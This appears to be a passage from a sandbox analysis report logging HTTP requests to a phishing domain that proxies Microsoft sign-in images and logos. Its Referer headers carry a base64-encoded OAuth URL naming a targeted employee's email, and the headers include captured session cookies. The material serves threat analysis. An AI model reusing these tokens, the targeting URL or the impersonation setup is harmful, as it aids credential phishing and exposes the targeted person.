imageReferer: https://webnnicuttnortheastusa.com/?i205f05ud=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1sYXdyZW5jZS5mcmFuY2UlNDBjYWJpbmV0d29ya3Nncm91cC5jb20mY2xpZW50LXJlcXVlc3QtaWQ9ZDlhM2YyZTMtMjE2NC1kODVkLTNiMmUtMjg3ZGMzNDM1OWVlJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU0NTgyMzcwNDA1OTA0MS5jODc0MzE2ZS0zMTJlLTQ1MWYtODQ4Ny1hNGYwZDFmNmIyMjMmc3RhdGU9RFl0QkRzSWdFQUJCMy1LUmRvRUYxb1B4S1lZaVZHSUxCbXY0dmh4bTVqU2NNWFllbkFZY2hwaXptZ3dhVXRvQmdya0N5aW1RUXkxdEZGcXFLTkRJSkFqSkNZOEpuakxaUlNuTngwdHo3WDYtYjNYTjVmSEs1Ymh0dnJkWVFweFM4eU1YaE9DWFhPTFJhM3RfMTFaX255blVfUTg=&sso_reload=trueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=NmXp2xNoncrA; qPdM.sig=PdFKt5Q0dibZLyOxyyMieCf2SU8; ClientId=DC6EE31578E74AAEA2886B6234ACAA88; OIDC=1; OpenIdConnect.nonce.v3.f5DiCeMUtBQ2uL8n9vjBqgjOau5wx5op5bEdqzXqekA=638545823704059041.c874316e-312e-451f-8487-a4f0d1f6b223; X-OWA-RedirectHistory=ArLym14BoYywIguS3Ag; esctx-Ghbu3M8NGZw=AQABCQEAAAApTwJmzXqdR4BN2miheQMYGF6vujKXDYHK1lda4NaoP7399KrTzgz6gd8AWbma8TJtEi2nN6G7u-UHxyrlOK_xc1us_1Ii1677t_7CXaJev_q9Y10ngeMo-SZIqrMpf5pPlOKVgV2wj0x2z7n3nIuQ2jf8bcStGO3kAEvmYxKV4iAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AVgAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAAApTwJmzXqdR4BN2miheQMYAKfb0xDrBDmuWkDZksychHezAXJVsHP4EQwGx7a3_trg7co4sO791uh9-QiGf586jFW5A634qM65rEyFS5zxB1c2R_quGsxybUxFS72HmL8gAA; esctx=PAQABBwEAAAApTwJmzXqdR4BN2miheQMYZRbmyOSq5H_vI0oMz1hhofSWhTEdlIctIO47tS5ABlihZKqM0tfj0hH8SzF__qcI0mAflGpmWNW8UE2CTcj8J7NYF4j6Plk0WyQUo4Q-tvMUsB2TwXPKUpqb6X1rH_kF9TPEA2Ftn1GJeBhPRER_FAcam7NKKcYUWU9HR47iljogAA; esctx-zbHcFhnl1NU=AQABCQEAAAApTwJmzXqdR4BN2miheQMYWA3zCT34QFOutTGBrXFIUye0ejGv9uet9_02Tipac6s7qPmoEhkGFLY65lFqSl6gu8nPMk5xzIbYSYFZXvp8bzdgFEe5S73WgY6ncbs6thp4c2cf3jWaGSGqNGQ28HvU_V1uoT4OMs2FXTs6e20V0SAA; fpc=Ahr3BJFnNFVEniLAsb5y5xOerOTJAQAAAGWaB94OAAAA; brcap=0
Source: global traffic	HTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/marching_ants_white_166de53471265253ab3a456defe6da23.gif HTTP/1.1Host: webnnicuttnortheastusa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=NmXp2xNoncrA; qPdM.sig=PdFKt5Q0dibZLyOxyyMieCf2SU8; ClientId=DC6EE31578E74AAEA2886B6234ACAA88; OIDC=1; OpenIdConnect.nonce.v3.f5DiCeMUtBQ2uL8n9vjBqgjOau5wx5op5bEdqzXqekA=638545823704059041.c874316e-312e-451f-8487-a4f0d1f6b223; X-OWA-RedirectHistory=ArLym14BoYywIguS3Ag; esctx-Ghbu3M8NGZw=AQABCQEAAAApTwJmzXqdR4BN2miheQMYGF6vujKXDYHK1lda4NaoP7399KrTzgz6gd8AWbma8TJtEi2nN6G7u-UHxyrlOK_xc1us_1Ii1677t_7CXaJev_q9Y10ngeMo-SZIqrMpf5pPlOKVgV2wj0x2z7n3nIuQ2jf8bcStGO3kAEvmYxKV4iAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AVgAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAAApTwJmzXqdR4BN2miheQMYAKfb0xDrBDmuWkDZksychHezAXJVsHP4EQwGx7a3_trg7co4sO791uh9-QiGf586jFW5A634qM65rEyFS5zxB1c2R_quGsxybUxFS72HmL8gAA; esctx=PAQABBwEAAAApTwJmzXqdR4BN2miheQMYZRbmyOSq5H_vI0oMz1hhofSWhTEdlIctIO47tS5ABlihZKqM0tfj0hH8SzF__qcI0mAflGpmWNW8UE2CTcj8J7NYF4j6Plk0WyQUo4Q-tvMUsB2TwXPKUpqb6X1rH_kF9TPEA2Ftn1GJeBhPRER_FAcam7NKKcYUWU9HR47iljogAA; esctx-zbHcFhnl1NU=AQABCQEAAAApTwJmzXqdR4BN2miheQMYWA3zCT34QFOutTGBrXFIUye0ejGv9uet9_02Tipac6s7qPmoEhkGFLY65lFqSl6gu8nPMk5xzIbYSYFZXvp8bzdgFEe5S73WgY6ncbs6thp4c2cf3jWaGSGqNGQ28HvU_V1uoT4OMs2FXTs6e20V0SAA; fpc=Ahr3BJFnNFVEniLAsb5y5xOerOTJAQAAAGWaB94OAAAA; brcap=0
Source: global traffic	HTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/marching_ants_b540a8e518037192e32c4fe58bf2dbab.gif HTTP/1.1Host: webnnicuttnortheastusa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=NmXp2xNoncrA; qPdM.sig=PdFKt5Q0dibZLyOxyyMieCf2SU8; ClientId=DC6EE31578E74AAEA2886B6234ACAA88; OIDC=1; OpenIdConnect.nonce.v3.f5DiCeMUtBQ2uL8n9vjBqgjOau5wx5op5bEdqzXqekA=638545823704059041.c874316e-312e-451f-8487-a4f0d1f6b223; X-OWA-RedirectHistory=ArLym14BoYywIguS3Ag; esctx-Ghbu3M8NGZw=AQABCQEAAAApTwJmzXqdR4BN2miheQMYGF6vujKXDYHK1lda4NaoP7399KrTzgz6gd8AWbma8TJtEi2nN6G7u-UHxyrlOK_xc1us_1Ii1677t_7CXaJev_q9Y10ngeMo-SZIqrMpf5pPlOKVgV2wj0x2z7n3nIuQ2jf8bcStGO3kAEvmYxKV4iAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AVgAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAAApTwJmzXqdR4BN2miheQMYAKfb0xDrBDmuWkDZksychHezAXJVsHP4EQwGx7a3_trg7co4sO791uh9-QiGf586jFW5A634qM65rEyFS5zxB1c2R_quGsxybUxFS72HmL8gAA; esctx=PAQABBwEAAAApTwJmzXqdR4BN2miheQMYZRbmyOSq5H_vI0oMz1hhofSWhTEdlIctIO47tS5ABlihZKqM0tfj0hH8SzF__qcI0mAflGpmWNW8UE2CTcj8J7NYF4j6Plk0WyQUo4Q-tvMUsB2TwXPKUpqb6X1rH_kF9TPEA2Ftn1GJeBhPRER_FAcam7NKKcYUWU9HR47iljogAA; esctx-zbHcFhnl1NU=AQABCQEAAAApTwJmzXqdR4BN2miheQMYWA3zCT34QFOutTGBrXFIUye0ejGv9uet9_02Tipac6s7qPmoEhkGFLY65lFqSl6gu8nPMk5xzIbYSYFZXvp8bzdgFEe5S73WgY6ncbs6thp4c2cf3jWaGSGqNGQ28HvU_V1uoT4OMs2FXTs6e20V0SAA; fpc=Ahr3BJFnNFVEniLAsb5y5xOerOTJAQAAAGWaB94OAAAA; brcap=0
Source: global traffic	HTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1Host: webnnicuttnortheastusa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://webnnicuttnortheastusa.com/?i205f05ud=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1sYXdyZW5jZS5mcmFuY2UlNDBjYWJpbmV0d29ya3Nncm91cC5jb20mY2xpZW50LXJlcXVlc3QtaWQ9ZDlhM2YyZTMtMjE2NC1kODVkLTNiMmUtMjg3ZGMzNDM1OWVlJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU0NTgyMzcwNDA1OTA0MS5jODc0MzE2ZS0zMTJlLTQ1MWYtODQ4Ny1hNGYwZDFmNmIyMjMmc3RhdGU9RFl0QkRzSWdFQUJCMy1LUmRvRUYxb1B4S1lZaVZHSUxCbXY0dmh4bTVqU2NNWFllbkFZY2hwaXptZ3dhVXRvQmdya0N5aW1RUXkxdEZGcXFLTkRJSkFqSkNZOEpuakxaUlNuTngwdHo3WDYtYjNYTjVmSEs1Ymh0dnJkWVFweFM4eU1YaE9DWFhPTFJhM3RfMTFaX255blVfUTg=&sso_reload=trueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=NmXp2xNoncrA; qPdM.sig=PdFKt5Q0dibZLyOxyyMieCf2SU8; ClientId=DC6EE31578E74AAEA2886B6234ACAA88; OIDC=1; OpenIdConnect.nonce.v3.f5DiCeMUtBQ2uL8n9vjBqgjOau5wx5op5bEdqzXqekA=638545823704059041.c874316e-312e-451f-8487-a4f0d1f6b223; X-OWA-RedirectHistory=ArLym14BoYywIguS3Ag; esctx-Ghbu3M8NGZw=AQABCQEAAAApTwJmzXqdR4BN2miheQMYGF6vujKXDYHK1lda4NaoP7399KrTzgz6gd8AWbma8TJtEi2nN6G7u-UHxyrlOK_xc1us_1Ii1677t_7CXaJev_q9Y10ngeMo-SZIqrMpf5pPlOKVgV2wj0x2z7n3nIuQ2jf8bcStGO3kAEvmYxKV4iAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AVgAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAAApTwJmzXqdR4BN2miheQMYAKfb0xDrBDmuWkDZksychHezAXJVsHP4EQwGx7a3_trg7co4sO791uh9-QiGf586jFW5A634qM65rEyFS5zxB1c2R_quGsxybUxFS72HmL8gAA; esctx=PAQABBwEAAAApTwJmzXqdR4BN2miheQMYZRbmyOSq5H_vI0oMz1hhofSWhTEdlIctIO47tS5ABlihZKqM0tfj0hH8SzF__qcI0mAflGpmWNW8UE2CTcj8J7NYF4j6Plk0WyQUo4Q-tvMUsB2TwXPKUpqb6X1rH_kF9TPEA2Ftn1GJeBhPRER_FAcam7NKKcYUWU9HR47iljogAA; esctx-zbHcFhnl1NU=AQABCQEAAAApTwJmzXqdR4BN2miheQMYWA3zCT34QFOutTGBrXFIUye0ejGv9uet9_02Tipac6s7qPmoEhkGFLY65lFqSl6gu8nPMk5xzIbYSYFZXvp8bzdgFEe5S73WgY6ncbs6thp4c2cf3jWaGSGqNGQ28HvU_V1uoT4OMs2FXTs6e20V0SAA; fpc=Ahr3BJFnNFVEniLAsb5y5xOerOTJAQAAAGWaB94OAAAA; brcap=0
Source: global traffic	HTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/appbackgrounds/49-small_e58aafc980614a9cd7796bea7b5ea8f0.jpg HTTP/1.1Host: webnnicuttnortheastusa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://webnnicuttnortheastusa.com/?i205f05ud=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1sYXdyZW5jZS5mcmFuY2UlNDBjYWJpbmV0d29ya3Nncm91cC5jb20mY2xpZW50LXJlcXVlc3QtaWQ9ZDlhM2YyZTMtMjE2NC1kODVkLTNiMmUtMjg3ZGMzNDM1OWVlJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU0NTgyMzcwNDA1OTA0MS5jODc0MzE2ZS0zMTJlLTQ1MWYtODQ4Ny1hNGYwZDFmNmIyMjMmc3RhdGU9RFl0QkRzSWdFQUJCMy1LUmRvRUYxb1B4S1lZaVZHSUxCbXY0dmh4bTVqU2NNWFllbkFZY2hwaXptZ3dhVXRvQmdya0N5aW1RUXkxdEZGcXFLTkRJSkFqSkNZOEpuakxaUlNuTngwdHo3WDYtYjNYTjVmSEs1Ymh0dnJkWVFweFM4eU1YaE9DWFhPTFJhM3RfMTFaX255blVfUTg=&sso_reload=trueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=NmXp2xNoncrA; qPdM.sig=PdFKt5Q0dibZLyOxyyMieCf2SU8; ClientId=DC6EE31578E74AAEA2886B6234ACAA88; OIDC=1; OpenIdConnect.nonce.v3.f5DiCeMUtBQ2uL8n9vjBqgjOau5wx5op5bEdqzXqekA=638545823704059041.c874316e-312e-451f-8487-a4f0d1f6b223; X-OWA-RedirectHistory=ArLym14BoYywIguS3Ag; esctx-Ghbu3M8NGZw=AQABCQEAAAApTwJmzXqdR4BN2miheQMYGF6vujKXDYHK1lda4NaoP7399KrTzgz6gd8AWbma8TJtEi2nN6G7u-UHxyrlOK_xc1us_1Ii1677t_7CXaJev_q9Y10ngeMo-SZIqrMpf5pPlOKVgV2wj0x2z7n3nIuQ2jf8bcStGO3kAEvmYxKV4iAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AVgAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAAApTwJmzXqdR4BN2miheQMYAKfb0xDrBDmuWkDZksychHezAXJVsHP4EQwGx7a3_trg7co4sO791uh9-QiGf586jFW5A634qM65rEyFS5zxB1c2R_quGsxybUxFS72HmL8gAA; esctx=PAQABBwEAAAApTwJmzXqdR4BN2miheQMYZRbmyOSq5H_vI0oMz1hhofSWhTEdlIctIO47tS5ABlihZKqM0tfj0hH8SzF__qcI0mAflGpmWNW8UE2CTcj8J7NYF4j6Plk0WyQUo4Q-tvMUsB2TwXPKUpqb6X1rH_kF9TPEA2Ftn1GJeBhPRER_FAcam7NKKcYUWU9HR47iljogAA; esctx-zbHcFhnl1NU=AQABCQEAAAApTwJmzXqdR4BN2miheQMYWA3zCT34QFOutTGBrXFIUye0ejGv9uet9_02Tipac6s7qPmoEhkGFLY65lFqSl6gu8nPMk5xzIbYSYFZXvp8bzdgFEe5S73WgY6ncbs6thp4c2cf3jWaGSGqNGQ28HvU_V1uoT4OMs2FXTs6e20V0SAA; fpc=Ahr3BJFnNFVEniLAsb5y5xOerOTJAQAAAGWaB94OAAAA; brcap=0
Source: global traffic	HTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/appbackgrounds/49_7916a894ebde7d29c2cc29b267f1299f.jpg HTTP/1.1Host: webnnicuttnortheastusa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://webnnicuttnortheastusa.com/?i205f05ud=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1sYXdyZW5jZS5mcmFuY2UlNDBjYWJpbmV0d29ya3Nncm91cC5jb20mY2xpZW50LXJlcXVlc3QtaWQ9ZDlhM2YyZTMtMjE2NC1kODVkLTNiMmUtMjg3ZGMzNDM1OWVlJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU0NTgyMzcwNDA1OTA0MS5jODc0MzE2ZS0zMTJlLTQ1MWYtODQ4Ny1hNGYwZDFmNmIyMjMmc3RhdGU9RFl0QkRzSWdFQUJCMy1LUmRvRUYxb1B4S1lZaVZHSUxCbXY0dmh4bTVqU2NNWFllbkFZY2hwaXptZ3dhVXRvQmdya0N5aW1RUXkxdEZGcXFLTkRJSkFqSkNZOEpuakxaUlNuTngwdHo3WDYtYjNYTjVmSEs1Ymh0dnJkWVFweFM4eU1YaE9DWFhPTFJhM3RfMTFaX255blVfUTg=&sso_reload=trueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=NmXp2xNoncrA; qPdM.sig=PdFKt5Q0dibZLyOxyyMieCf2SU8; ClientId=DC6EE31578E74AAEA2886B6234ACAA88; OIDC=1; OpenIdConnect.nonce.v3.f5DiCeMUtBQ2uL8n9vjBqgjOau5wx5op5bEdqzXqekA=638545823704059041.c874316e-312e-451f-8487-a4f0d1f6b223; X-OWA-RedirectHistory=ArLym14BoYywIguS3Ag; esctx-Ghbu3M8NGZw=AQABCQEAAAApTwJmzXqdR4BN2miheQMYGF6vujKXDYHK1lda4NaoP7399KrTzgz6gd8AWbma8TJtEi2nN6G7u-UHxyrlOK_xc1us_1Ii1677t_7CXaJev_q9Y10ngeMo-SZIqrMpf5pPlOKVgV2wj0x2z7n3nIuQ2jf8bcStGO3kAEvmYxKV4iAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AVgAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAAApTwJmzXqdR4BN2miheQMYAKfb0xDrBDmuWkDZksychHezAXJVsHP4EQwGx7a3_trg7co4sO791uh9-QiGf586jFW5A634qM65rEyFS5zxB1c2R_quGsxybUxFS72HmL8gAA; esctx=PAQABBwEAAAApTwJmzXqdR4BN2miheQMYZRbmyOSq5H_vI0oMz1hhofSWhTEdlIctIO47tS5ABlihZKqM0tfj0hH8SzF__qcI0mAflGpmWNW8UE2CTcj8J7NYF4j6Plk0WyQUo4Q-tvMUsB2TwXPKUpqb6X1rH_kF9TPEA2Ftn1GJeBhPRER_FAcam7NKKcYUWU9HR47iljogAA; esctx-zbHcFhnl1NU=AQABCQEAAAApTwJmzXqdR4BN2miheQMYWA3zCT34QFOutTGBrXFIUye0ejGv9uet9_02Tipac6s7qPmoEhkGFLY65lFqSl6gu8nPMk5xzIbYSYFZXvp8bzdgFEe5S73WgY6ncbs6thp4c2cf3jWaGSGqNGQ28HvU_V1uoT4OMs2FXTs6e20V0SAA; fpc=Ahr3BJFnNFVEniLAsb5y5xOerOTJAQAAAGWaB94OAAAA; brcap=0
Source: global traffic	HTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/applogos/53_8b36337037cff88c3df203bb73d58e41.png HTTP/1.1Host: webnnicuttnortheastusa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://webnnicuttnortheastusa.com/?i205f05ud=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1sYXdyZW5jZS5mcmFuY2UlNDBjYWJpbmV0d29ya3Nncm91cC5jb20mY2xpZW50LXJlcXVlc3QtaWQ9ZDlhM2YyZTMtMjE2NC1kODVkLTNiMmUtMjg3ZGMzNDM1OWVlJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU0NTgyMzcwNDA1OTA0MS5jODc0MzE2ZS0zMTJlLTQ1MWYtODQ4Ny1hNGYwZDFmNmIyMjMmc3RhdGU9RFl0QkRzSWdFQUJCMy1LUmRvRUYxb1B4S1lZaVZHSUxCbXY0dmh4bTVqU2NNWFllbkFZY2hwaXptZ3dhVXRvQmdya0N5aW1RUXkxdEZGcXFLTkRJSkFqSkNZOEpuakxaUlNuTngwdHo3WDYtYjNYTjVmSEs1Ymh0dnJkWVFweFM4eU1YaE9DWFhPTFJhM3RfMTFaX255blVfUTg=&sso_reload=trueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=NmXp2xNoncrA; qPdM.sig=PdFKt5Q0dibZLyOxyyMieCf2SU8; ClientId=DC6EE31578E74AAEA2886B6234ACAA88; OIDC=1; OpenIdConnect.nonce.v3.f5DiCeMUtBQ2uL8n9vjBqgjOau5wx5op5bEdqzXqekA=638545823704059041.c874316e-312e-451f-8487-a4f0d1f6b223; X-OWA-RedirectHistory=ArLym14BoYywIguS3Ag; esctx-Ghbu3M8NGZw=AQABCQEAAAApTwJmzXqdR4BN2miheQMYGF6vujKXDYHK1lda4NaoP7399KrTzgz6gd8AWbma8TJtEi2nN6G7u-UHxyrlOK_xc1us_1Ii1677t_7CXaJev_q9Y10ngeMo-SZIqrMpf5pPlOKVgV2wj0x2z7n3nIuQ2jf8bcStGO3kAEvmYxKV4iAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AVgAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAAApTwJmzXqdR4BN2miheQMYAKfb0xDrBDmuWkDZksychHezAXJVsHP4EQwGx7a3_trg7co4sO791uh9-QiGf586jFW5A634qM65rEyFS5zxB1c2R_quGsxybUxFS72HmL8gAA; esctx=PAQABBwEAAAApTwJmzXqdR4BN2miheQMYZRbmyOSq5H_vI0oMz1hhofSWhTEdlIctIO47tS5ABlihZKqM0tfj0hH8SzF__qcI0mAflGpmWNW8UE2CTcj8J7NYF4j6Plk0WyQUo4Q-tvMUsB2TwXPKUpqb6X1rH_kF9TPEA2Ftn1GJeBhPRER_FAcam7NKKcYUWU9HR47iljogAA; esctx-zbHcFhnl1NU=AQABCQEAAAApTwJmzXqdR4BN2miheQMYWA3zCT34QFOutTGBrXFIUye0ejGv9uet9_02Tipac6s7qPmoEhkGFLY65lFqSl6gu8nPMk5xzIbYSYFZXvp8bzdgFEe5S73WgY6ncbs6thp4c2cf3jWaGSGqNGQ28HvU_V1uoT4OMs2FXTs6e20V0SAA; fpc=Ahr3BJFnNFVEniLAsb5y5xOerOTJAQAAAGWaB94OAAAA; brcap=0
Source: global traffic	HTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1Host: webnnicuttnortheastusa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: 